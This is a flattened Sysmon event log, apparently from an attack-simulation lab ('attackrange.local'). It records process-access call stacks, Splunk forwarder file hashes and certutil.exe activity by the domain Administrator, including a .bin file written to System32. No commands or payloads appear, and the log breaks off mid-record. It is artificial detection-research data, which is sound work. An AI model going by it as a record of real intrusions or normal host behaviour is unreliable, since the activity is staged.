21:49:40.726{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917458Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:40.726{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917457Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:40.206{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C27AA3166CF55EBE767BC08C5B2D9589,SHA256=BB2CCDC61D28233CFB845C1DB258461CDC781A96F8D1397B214700B9D8B87248,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638454Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:40.226{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CD9AB92D0353252672C63322FB1165D,SHA256=B4E7C66F315BAF24B515A5BC1B3C25AB398A7DCFCEEC317DE93EA1A86AF2A94F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638453Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:35.428{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57251-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638455Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:41.241{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3169F1DFEDE54D454B8CF6301BC09B5E,SHA256=C83611E80BFD2982D9C48E27E320C1750160A1B4B24EE6B6A1E08D74F26B8736,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917462Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:41.727{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917461Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:41.727{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917460Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:41.384{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D58BBF1D4E0BC871D6488F3FCDF1AA3E,SHA256=11AD5BFDCFC579CC96DF55E950DBB72E03D9FABBFFEF3A5C4F693DEC35AE3608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638456Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:42.288{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=298D8906980997A721BD7C5EE7EFDA77,SHA256=55142FDBAB6089C1062A5812928F8CFD35F7F6FCDD1EA38BBA2A34C34B2A7E31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917509Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.727{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917508Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.727{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917507Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.563{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C536AAA886E1C0B32C9F495FDB5BBD1D,SHA256=A636CBBF3790B429F8144D257CA0B9F9065A7DD6AFB0748CB306F2365CD4CB19,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917506Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.455{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917505Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.455{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917504Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.450{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917503Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.450{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917502Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.450{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917501Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.446{896A638B-B3F6-605B-7869-00000000AE01}4944ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Windows\System32\2d2a313164ae3a724cc53b0c8e104dd6053f8402.binMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917500Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.407{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917499Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.406{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917498Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.394{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917497Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.394{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917496Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.338{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917495Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.337{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917494Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.337{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917493Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.336{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917492Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.336{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917491Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.331{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917490Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.331{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917489Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.331{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917488Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.330{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7869-00000000AE01}4944C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917487Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.330{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917486Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.329{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917485Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.329{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917484Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.329{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B3F6-605B-7969-00000000AE01}1632C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917483Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 